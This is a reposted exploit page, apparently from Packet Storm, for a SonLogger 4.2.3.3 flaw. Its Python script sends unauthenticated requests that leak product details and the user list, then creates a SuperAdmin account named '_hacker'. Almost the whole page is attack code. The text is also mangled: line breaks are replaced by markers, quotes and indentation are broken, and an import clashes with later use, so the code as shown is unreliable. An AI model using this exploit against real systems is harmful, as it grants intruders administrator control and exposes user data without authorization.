Published on March 16th, 2021 📆 | 4871 Views ⚑

SonLogger 4.2.3.3 SuperAdmin Account Creation / Information Disclosure ≈ Packet Storm

[*]# Exploit Title: Sonlogger 4.2.3.3 – SuperAdmin Account Creation / Information Disclosure[*]# Date: 04-02-2021[*]# Exploit Author: Berkan Er[*]# Vendor Homepage: https://www.sonlogger.com/[*]# Version: 4.2.3.3[*]# Tested on: Windows 10 Enterprise x64 Version 1803[*]# A remote attacker can be create an user with SuperAdmin profile

#!/usr/bin/python3

import argparse[*]import string[*]import sys[*]from random import random

import requests[*]import json

banner = ”'[*]Sonlogger Log and Report System – v4.2.3.3[*]Remote SuperAdmin Account Creation Vulnerability / Information Disclosure

Berkan Er [*]@erberkan[*]”’

commonHeaders = {[*]’Content-type’: ‘application/json’,[*]’Accept’: ‘application/json, text/javascript, */*; q=0.01′,[*]’X-Requested-With’: ‘XMLHttpRequest'[*]}

def get_random_string():[*]res = ”.join(random.choices(string.ascii_lowercase, k=8))[*]print(res)[*]return str(res)

def getProductInfo(host, port, flag):[*]response = requests.post(‘http://’ + host + ‘:’ + port + ‘/shared/GetProductInfo’,[*]data={},[*]headers=commonHeaders)

print(“[*] Status code: “, response.status_code)[*]print(“[*] Product Version: “, response.json()[‘Version’])[*]info_json = json.dumps(response.json(), indent=2)

response_1 = requests.post(‘http://’ + host + ‘:’ + port + ‘/User/getUsers’, data={}, headers=commonHeaders)[*]user_json = json.dumps(response_1.json(), indent=2)

if flag:[*]print(“n*** Product Infos=n” + info_json)[*]print(“n*** Users=n” + user_json)

if response.json()[‘Version’] == ‘4.2.3.3’:[*]print(“[+] It seems vulnerable !”)[*]return True[*]else:[*]print(“[!] It doesn’t vulnerable !”)[*]return False

def createSuperAdmin(host, port):[*]payload = ”'{[*]’_profilename’:’superadmin_profile’, [*]’_username’:’_hacker’, [*]’_password’:’_hacker’, [*]’_fullname’:”, ‘_email’:”[*]}”’

response = requests.post(‘http://’ + host + ‘:’ + port + ‘/User/saveUser’, data=payload, headers=commonHeaders)[*]print(“[*] STAUTS CODE:”, response.status_code)[*]print(“[!] User has been created ! nUsername: _hackernPassword: _hacker”)

response_1 = requests.post(‘http://’ + host + ‘:’ + port + ‘/User/getUsers’, data={}, headers=commonHeaders)[*]json_formatted_str = json.dumps(response_1.json(), indent=2)[*]print(“n*** Users=n” + json_formatted_str)

def main():[*]print(banner)

try:[*]host = sys.argv[1][*]port = sys.argv[2][*]action = sys.argv[3]

if action == ‘TRUE’:[*]if getProductInfo(host, port, False):[*]createSuperAdmin(host, port)[*]else:[*]getProductInfo(host, port, True)

print(“KTHNXBYE!”)

except:[*]print(“Usage:npython3 sonlogger-superadmin_create.py < IP > < PORT > < CREATE USER {TRUE / FALSE} >nnIP:tIP “[*]”Address of Sonlogger hostnPORT:tPort number of Sonlogger hostnTRUE:tCreate UsernFALSE:tShow Product “[*]”Infos”)[*]print(“nExample: python3 sonlogger-superadmin_create.py 192.168.1.10 5000 TRUEn”)

if __name__ == “__main__”:[*]main()

Source link